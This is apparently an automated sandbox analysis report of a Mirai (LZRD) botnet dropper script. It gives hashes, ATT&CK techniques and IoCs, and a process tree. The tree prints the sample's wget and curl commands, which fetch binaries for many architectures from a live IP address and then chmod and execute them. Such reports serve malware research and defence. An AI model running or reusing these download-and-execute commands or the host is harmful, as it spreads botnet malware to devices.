mirai | c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1

Analysis

max time kernel
149s
max time network
159s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
24-12-2024 05:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh
Size

3KB
MD5

8cadf8766bc5de0f7f7df9bf000cd0aa
SHA1

fa6c2f9c7a20a3c1c6831d859d4b809aadf49567
SHA256

c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1
SHA512

8859f146c24023b97e34f53eda375ce9a0df64037806c86271d00a596a37097afbb7cfa4ffe1df2d58b4ed252fb048277ae8c3fc304be1551a33541390c8bac2

Score

10^/10

mirai lzrd antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
801	chmod
754	chmod
780	chmod
813	chmod
830	chmod
716	chmod
741	chmod
818	chmod
843	chmod
856	chmod
862	chmod
694	chmod
790	chmod
795	chmod
849	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/Chaotic	695	Chaotic
/tmp/Chaotic	718	Chaotic
/tmp/Chaotic	742	Chaotic
/tmp/Chaotic	755	Chaotic
/tmp/Chaotic	781	Chaotic
/tmp/Chaotic	791	Chaotic
/tmp/Chaotic	796	Chaotic
/tmp/Chaotic	802	Chaotic
/tmp/Chaotic	814	Chaotic
/tmp/Chaotic	819	Chaotic
/tmp/Chaotic	831	Chaotic
/tmp/Chaotic	844	Chaotic
/tmp/Chaotic	850	Chaotic
/tmp/Chaotic	857	Chaotic
/tmp/Chaotic	863	Chaotic

Modifies Watchdog functionality 1 TTPs 6 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 6 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	Chaotic
File opened for modification	/bin/watchdog	Chaotic
File opened for modification	/sbin/watchdog	Chaotic
File opened for modification	/bin/watchdog	Chaotic
File opened for modification	/sbin/watchdog	Chaotic
File opened for modification	/bin/watchdog	Chaotic

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-5.dat	upx
behavioral2/files/fstream-6.dat	upx
behavioral2/files/fstream-7.dat	upx
behavioral2/files/fstream-8.dat	upx

Checks CPU configuration 1 TTPs 15 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/29/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/43/status	Chaotic
File opened for reading	/proc/110/status	Chaotic
File opened for reading	/proc/8/status	Chaotic
File opened for reading	/proc/744/status	Chaotic
File opened for reading	/proc/3/status	Chaotic
File opened for reading	/proc/152/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/6/status	Chaotic
File opened for reading	/proc/2/status	Chaotic
File opened for reading	/proc/21/status	Chaotic
File opened for reading	/proc/171/status	Chaotic
File opened for reading	/proc/805/status	Chaotic
File opened for reading	/proc/152/status	Chaotic
File opened for reading	/proc/651/status	Chaotic
File opened for reading	/proc/805/status	Chaotic
File opened for reading	/proc/822/status	Chaotic
File opened for reading	/proc/1/status	Chaotic
File opened for reading	/proc/23/status	Chaotic
File opened for reading	/proc/651/status	Chaotic
File opened for reading	/proc/1/status	Chaotic
File opened for reading	/proc/16/status	Chaotic
File opened for reading	/proc/18/status	Chaotic
File opened for reading	/proc/14/status	Chaotic
File opened for reading	/proc/79/status	Chaotic
File opened for reading	/proc/262/status	Chaotic
File opened for reading	/proc/79/status	Chaotic
File opened for reading	/proc/12/status	Chaotic
File opened for reading	/proc/42/status	Chaotic
File opened for reading	/proc/643/status	Chaotic
File opened for reading	/proc/649/status	Chaotic
File opened for reading	/proc/831/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/9/status	Chaotic
File opened for reading	/proc/101/status	Chaotic
File opened for reading	/proc/6/status	Chaotic
File opened for reading	/proc/41/status	Chaotic
File opened for reading	/proc/171/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/4/status	Chaotic
File opened for reading	/proc/42/status	Chaotic
File opened for reading	/proc/4/status	Chaotic
File opened for reading	/proc/140/status	Chaotic
File opened for reading	/proc/142/status	Chaotic
File opened for reading	/proc/26/status	Chaotic
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/7/status	Chaotic
File opened for reading	/proc/79/status	Chaotic
File opened for reading	/proc/281/status	Chaotic
File opened for reading	/proc/588/status	Chaotic
File opened for reading	/proc/651/status	Chaotic
File opened for reading	/proc/9/status	Chaotic
File opened for reading	/proc/15/status	Chaotic
File opened for reading	/proc/108/status	Chaotic
File opened for reading	/proc/603/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/23/status	Chaotic
File opened for reading	/proc/295/status	Chaotic
File opened for reading	/proc/111/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/598/status	Chaotic
File opened for reading	/proc/8/status	Chaotic
File opened for reading	/proc/15/status	Chaotic

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
788	curl
789	cat
757	wget
768	curl
779	cat
784	wget

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/Chaotic	c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	wget
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sparc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	curl

/tmp/c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh
/tmp/c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh
1⤵
- Writes file to tmp directory
PID:651
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:653
- /usr/bin/wget
  wget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:659
- /usr/bin/curl
  curl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:682
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  PID:692
- /bin/chmod
  chmod +x busybox c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh Chaotic systemd-private-102dfdb01fec49a79d735c5788411190-systemd-timedated.service-EpDdBF ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - File and Directory Permissions Modification
  PID:694
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:695
- /usr/bin/wget
  wget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Writes file to tmp directory
  PID:698
- /usr/bin/curl
  curl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:706
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  PID:715
- /bin/chmod
  chmod +x busybox c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh Chaotic systemd-private-102dfdb01fec49a79d735c5788411190-systemd-timedated.service-EpDdBF ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - File and Directory Permissions Modification
  PID:716
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:718
- /usr/bin/wget
  wget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Writes file to tmp directory
  PID:721
- /usr/bin/curl
  curl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:732
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  PID:740
- /bin/chmod
  chmod +x busybox c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh Chaotic systemd-private-102dfdb01fec49a79d735c5788411190-systemd-timedated.service-EpDdBF ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:741
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:742
- /usr/bin/wget
  wget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Writes file to tmp directory
  PID:745
- /usr/bin/curl
  curl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:746
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  PID:752
- /bin/chmod
  chmod +x busybox c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh Chaotic systemd-private-102dfdb01fec49a79d735c5788411190-systemd-timedated.service-EpDdBF ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:754
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:755
- /usr/bin/wget
  wget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:757
- /usr/bin/curl
  curl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:768
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  PID:779
- /bin/chmod
  chmod +x busybox c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh Chaotic systemd-private-102dfdb01fec49a79d735c5788411190-systemd-timedated.service-EpDdBF ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:780
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:781
- /usr/bin/wget
  wget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:784
- /usr/bin/curl
  curl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:788
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:789
- /bin/chmod
  chmod +x busybox c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh Chaotic systemd-private-102dfdb01fec49a79d735c5788411190-systemd-timedated.service-EpDdBF ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:790
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:791
- /usr/bin/wget
  wget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Writes file to tmp directory
  PID:792
- /usr/bin/curl
  curl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:793
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  PID:794
- /bin/chmod
  chmod +x busybox c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh Chaotic systemd-private-102dfdb01fec49a79d735c5788411190-systemd-timedated.service-EpDdBF ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:795
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:796
- /usr/bin/wget
  wget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Writes file to tmp directory
  PID:798
- /usr/bin/curl
  curl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:799
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  PID:800
- /bin/chmod
  chmod +x busybox c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh Chaotic systemd-private-102dfdb01fec49a79d735c5788411190-systemd-timedated.service-EpDdBF ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:801
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:802
- /usr/bin/wget
  wget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Writes file to tmp directory
  PID:810
- /usr/bin/curl
  curl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:811
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  PID:812
- /bin/chmod
  chmod +x busybox c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh Chaotic systemd-private-102dfdb01fec49a79d735c5788411190-systemd-timedated.service-EpDdBF ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:813
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:814
- /usr/bin/wget
  wget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Writes file to tmp directory
  PID:815
- /usr/bin/curl
  curl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:816
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  PID:817
- /bin/chmod
  chmod +x busybox c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh Chaotic systemd-private-102dfdb01fec49a79d735c5788411190-systemd-timedated.service-EpDdBF ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:818
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:819
- /usr/bin/wget
  wget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Writes file to tmp directory
  PID:827
- /usr/bin/curl
  curl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:828
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  PID:829
- /bin/chmod
  chmod +x busybox c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh Chaotic systemd-private-102dfdb01fec49a79d735c5788411190-systemd-timedated.service-EpDdBF ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:830
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:831
- /usr/bin/wget
  wget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Writes file to tmp directory
  PID:840
- /usr/bin/curl
  curl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:841
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  PID:842
- /bin/chmod
  chmod +x busybox c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh Chaotic ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:843
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:844
- /usr/bin/wget
  wget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:846
- /usr/bin/curl
  curl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:847
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:848
- /bin/chmod
  chmod +x busybox c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh Chaotic ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:849
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:850
- /usr/bin/wget
  wget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Writes file to tmp directory
  PID:851
- /usr/bin/curl
  curl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:854
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  PID:855
- /bin/chmod
  chmod +x busybox c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh Chaotic ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:857
- /usr/bin/wget
  wget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Writes file to tmp directory
  PID:859
- /usr/bin/curl
  curl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:860
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  PID:861
- /bin/chmod
  chmod +x busybox c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1.sh Chaotic ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:862
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:863

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Chaotic

Filesize
37KB

MD5
fc32f8a67d1b0590d25d38c2614d72d9

SHA1
be2059efd5d4fcd999672caa7970019eb160bf13

SHA256
1bd4414e839b5d0be6d814d0d3daae5f64df063fb87865d32fbe815e02d587fa

SHA512
b99e74e7b031a5f21b1fece80c6976718a33efb3da3c13949fa8053f1e47970f335766a4376f33edff2dfaf79b144669ef28387dc73e9ff34cb77c94b47b9047

Download Submit
/tmp/Chaotic

Filesize
36KB

MD5
2bd66161d02afa8b3891285f7f9cbfdf

SHA1
2ca808e492bf74c2cb8576f72212d3a88a7bd0af

SHA256
21d663bd5974d560e377afd55d4ebaa86f82427db24b9f888197d1461bba80d1

SHA512
8ded171bb4c03ec978b32048f088f167bc7433192befadb074c6cde71e67be934c9878bd5a1c4b42e5bcfac5682f93882df65ac9cfbcf633e8b450b11bda2574

Download Submit
/tmp/Chaotic

Filesize
37KB

MD5
5a0517d1fa30a6fab030e281d2957328

SHA1
4abefe8b469f8e7efebb4756ea5d0963cff00161

SHA256
e9b0591495af8c41cc5d6bb3dc368fc2df912322fd62be36c378f1b854764290

SHA512
f387c8c2e996ba98b9a100c260959d3454f75d4580e5862209c7e2338b3a6fb15213191681536912b45cac0c05427c925040f3bf64bc224a75eb12721ca760bc

Download Submit
/tmp/Chaotic

Filesize
43KB

MD5
50bf10e8cdfe9739c0cf974778e0bda1

SHA1
212c2d9325b1c4a04ab78073f9094ff0010d3e6e

SHA256
b105e2e16e62e0156c93ec6adb3786aac39387b326c151bd4740e705a7ab99e4

SHA512
3db5b2334a7c5d966ed36c4ea61c31e5938e07aae63ece079ac421f60e83caca5ab3f4ec73279378cc95b2dc7e214912c2caeb42426c4cd00a4d9ebc28c65c74

Download Submit
/tmp/Chaotic

Filesize
95KB

MD5
